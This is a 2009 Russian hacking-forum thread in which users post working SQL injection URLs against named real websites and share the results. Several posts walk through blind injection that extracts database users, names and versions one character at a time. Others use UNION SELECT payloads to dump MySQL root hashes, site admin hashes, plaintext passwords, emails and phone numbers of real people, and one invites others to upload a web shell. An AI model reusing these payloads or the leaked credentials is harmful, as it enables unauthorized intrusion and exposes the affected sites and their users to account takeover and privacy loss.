ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7661  
Старый 05.02.2009, 19:47
Аватар для pinky07
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
Отправить сообщение для pinky07 с помощью ICQ
По умолчанию

http://www.bekkin.ru

юзер:
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 1,1)))=109 m
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 2,1)))=121 y
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 3,1)))=115 s
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 4,1)))=113 q
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 5,1)))=108 l
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 6,1)))=98 b
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 7,1)))=101 e
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 8,1)))=107 k
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 9,1)))=107 k
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 10,1)))=105 i
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 11,1)))=110 n
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 12,1)))=64 @
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 13,1)))=108 l
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 14,1)))=111 o
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 15,1)))=99 c
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 16,1)))=97 a
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 17,1)))=108 l
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 18,1)))=104 h
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 19,1)))=111 o
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 20,1)))=115 s
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 21,1)))=116 t
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 22,1)))=0

бд:
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(databas e(),1,1)))=98 b
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(databas e(),2,1)))=101 e
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(databas e(),3,1)))=107 k
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(databas e(),4,1)))=107 k
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(databas e(),5,1)))=105 i
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(databas e(),6,1)))=110 n
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(databas e(),7,1)))=0

Версия MySQL:
http://www.bekkin.ru/index.php?rub=11+and+substring(version(),1,1)=3 3
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(version (),2,1)))=46 .
http://www.bekkin.ru/index.php?rub=11+and+substring(version(),3,1)=2 2
http://www.bekkin.ru/index.php?rub=11+and+substring(version(),4,1)=3 3
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(version (),5,1)))=46 .
http://www.bekkin.ru/index.php?rub=11+and+substring(version(),6,1)=5 5
http://www.bekkin.ru/index.php?rub=11+and+substring(version(),7,1)=8 8
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(version (),8,1)))=0
 
Ответить с цитированием

  #7662  
Старый 05.02.2009, 19:52
Аватар для Assembler
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

Код:
http://unixdows.com/cms/php.php?id=-1%20union%20select%20version(),%20concat_ws(0x3a,user_id,user_password%20)%20from%20tbl_auth_user--
Код:
http://www.ihf-hr.org/cms/cms.php?sec_id=1&pag_id=-4%20union%20select%20version()--

Последний раз редактировалось jokester; 05.02.2009 в 20:09.. Причина: bluebit.com.au БОЯН
 
Ответить с цитированием

IP Call
  #7663  
Старый 05.02.2009, 20:05
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию IP Call

http://www.smartcall.ro/document.php?doc=-7+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT_ WS(0x3a,Version(),Database(),User()),0x71),0x71),4 ,5,6,7,8,9--

Database Version: 5.0.18
Database name: smartcall
User name: smartcall@localhost


[0]:1:dima:dima@smartcall.ro:ebb934cccce0cbe48e5b0173 98807a46
[1]:2:Saficus:catalin.sarafoleanu@smartcall.ro:5d0f13 929ca7be7812e00cf0353bac1d
[2]:3:alx:alexandru.albu@smartcall.ro:8ae4f4568bcc10b 12d8ececaf24ade76


[0]:43:j:20050082:40250776460:k:k
[1]:44:d:20050082:40250776460:k:k
[2]:45:l:20050082:40250776460:s:s
[3]:46:l:20050082:40250776460:k:k
[4]:47:albu alexandru:3333:40212601289:alexandru.albu@smartcal l.ro:nuamparola
[5]:48:Print Pack Prod:90:40214608399:liviu.micu@smartcall.rorint
 
Ответить с цитированием

  #7664  
Старый 05.02.2009, 20:39
Аватар для pinky07
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
Отправить сообщение для pinky07 с помощью ICQ
По умолчанию

http://www.bkreml.ru

юзер:
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),1,1)))=' 109 m
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),2,1)))=' 97 a
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),3,1)))=' 120 x
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),4,1)))=' 105 i
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),5,1)))=' 98 b
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),6,1)))=' 105 i
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),7,1)))=' 116 t
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),8,1)))=' 95 _
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),9,1)))=' 107 k
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),10,1)))= '97 a
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),11,1)))= '122 z
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),12,1)))= '97 a
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),13,1)))= '110 n
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),14,1)))= '64 @
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),15,1)))= '108 l
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),16,1)))= '111 o
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),17,1)))= '99 c
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),18,1)))= '97 a
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),19,1)))= '108 l
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),20,1)))= '104 h
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),21,1)))= '111 o
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),22,1)))= '115 s
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),23,1)))= '116 t
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),24,1)))= '0

бд:
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),1,1) ))='109 m
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),2,1) ))='96 a
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),3,1) ))='120 x
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),4,1) ))='105 i
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),5,1) ))='98 b
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),6,1) ))='105 i
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),7,1) ))='116 t
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),8,1) ))='95 _
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),9,1) ))='107 k
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),10,1 )))='97 a
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),11,1 )))='122 z
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),12,1 )))='97 a
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),13,1 )))='110 n
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),14,1 )))='0

версия MySQL:
http://www.bkreml.ru/?page=5'+and+substring(version(),1,1)='3 3
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(version(),2,1)) )='46 .
http://www.bkreml.ru/?page=5'+and+substring(version(),3,1)='2 2
http://www.bkreml.ru/?page=5'+and+substring(version(),4,1)='3 3
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(version(),5,1)) )='46 .
http://www.bkreml.ru/?page=5'+and+substring(version(),6,1)='4 4
http://www.bkreml.ru/?page=5'+and+substring(version(),7,1)='4 4
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(version(),8,1)) )='0
 
Ответить с цитированием

  #7665  
Старый 05.02.2009, 21:37
Аватар для AkyHa_MaTaTa
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

www.condi.ru PageRank: 4 тИЦ: 450
Код:
http://www.condi.ru/news.php?news_id=-7+union+select+1,2,unhex(hex(concat_ws(user(),version(),database()))),4,5
alink@localhost:4.1.18-log:condi

www.zsk.ru PageRank: 5 тИЦ: 350
Код:
http://www.zsk.ru/news.php?newsid=32+union+select+1,2,3,4,concat_ws(0x3A,version(),user(),database()),6,7,8,9,10,11,12,13--
З.Ы. кандидаты в антибоян.

Последний раз редактировалось AkyHa_MaTaTa; 05.02.2009 в 21:51..
 
Ответить с цитированием

  #7666  
Старый 05.02.2009, 21:50
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Ещё одна крупная компания -) Берём рута

Цитата:
http://www.vero-software.com/news_detail.php?id=180980980983+union+select+1,2,c oncat_ws(0x3a,version(),user(),database()),4,5,6--
Database Version: 5.0.45-community-nt
Database name: vero_english
User name: root@localhost

Берём юзеров с мускула! Он один. Ах как обидно -)

Цитата:
http://www.vero-software.com/news_detail.php?id=180980980983+UNION+SELECT+1,2,A ES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT( User,0x3a,Password)+FROM+mysql.user+LIMIT+0,1),0x3 a),0x71),0x71),4,5,6--
: root : *4F94E0B0F39112E823AFC0BFA211C72E2897226F

Цитата:
Бегаем везде по разным сервисам но почему то облом не брутится -(.И опять не обидно есть читалка. Ведь file priv хорошо говорит всё -)
 
Ответить с цитированием

  #7667  
Старый 05.02.2009, 22:19
Аватар для BloodyMessage
BloodyMessage
Участник форума
Регистрация: 20.08.2006
Сообщений: 199
Провел на форуме:
1074298

Репутация: 131
Отправить сообщение для BloodyMessage с помощью ICQ
По умолчанию

PR4

Цитата:
http://www.freeonlinebooks.org/displaybook1.php?chapter_id=7&id=-1+union+select+1,2,3,4,5,6--
+
http://www.speedreading.com/ - PR3
http://www.rocketreader.com/ - PR5

Database Version: 5.0.45-community
Database name: ebook_genre
User name: root@localhost

Цитата:
http://www.freeonlinebooks.org/displaybook1.php?chapter_id=7&id=-1+union+select+1,2,3,4,concat(name,0x3a,pass),6+fr om+drupal.users+limit+0,1--
Цитата:
http://www.freeonlinebooks.org/admin/
admin:b8ad16f54966251f85263ca612dbb705
maya:c8772558781f513ea51a2312e8d1346a

Цитата:
http://www.rocketreader.com/login.php
portaladmin@rocketreader.com:jim234be

Цитата:
http://www.freeonlinebooks.org/displaybook1.php?chapter_id=7&id=-1+union+select+1,2,3,4,concat(username,0x3a,user_p assword),6+from+freeonlinebooks_forums.phpbb_users +limit+1,1--
от форума freeonlinebooks:
Цитата:
http://www.freeonlinebooks.org/forums/ucp.php?mode=login
speed:$H$9.Z3lXp2zBIoIY5hyIFoFtnzNBCyAa/ (в другой базе нашел пасс seagull692)

Цитата:
http://www.freeonlinebooks.org/displaybook1.php?chapter_id=7&id=-1+union+select+1,2,3,4,concat(username,0x3a,user_p assword),6+from+speed_speedreading.phpbb_users+lim it+1,1--
форум speedreading:
Цитата:
http://www.speedreading.com/phpBB2/index.php

Цитата:
http://www.freeonlinebooks.org/displaybook1.php?chapter_id=7&id=-1+union+select+1,2,3,4,concat(User,0x3a,Password), 6+from+mysql.user+limit+0,1--
root:*5D81277EE8B4D2F2C50DA72812A9C12AF9A2DF3E

Еще хз откуда пароли, пока писал, уже забыл, но думаю вам не составит труда найти:

admin:testrocket
amjith:amjith

Последний раз редактировалось BloodyMessage; 08.02.2009 в 08:54..
 
Ответить с цитированием

  #7668  
Старый 05.02.2009, 22:58
Аватар для faza02
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://www.songlines.co.uk/topoftheworld/top-of-the-world.php?id=-37+union+select+1,2,version(),4,5,6,7,8/*
4.1.22

 
Ответить с цитированием

edu.ro
  #7669  
Старый 05.02.2009, 23:06
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию edu.ro

http://www.geo.edu.ro/sgr/article.php?sid=-125+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8--


Database Version: 4.0.18
Database name: sgr
User name: root@localhost



Found mysql.users with columns user, password

Found users with columns email,name,uname,uid,pass
 
Ответить с цитированием

  #7670  
Старый 05.02.2009, 23:24
Аватар для zifanchuck
zifanchuck
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
Провел на форуме:
4002393

Репутация: 464
Отправить сообщение для zifanchuck с помощью ICQ
По умолчанию

пр6
http://www.realityofaid.org/news.php?id=-1+union+select+1,2,3,4,5,6--

5 ветка

есл зальете шелл напишите в личку=)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ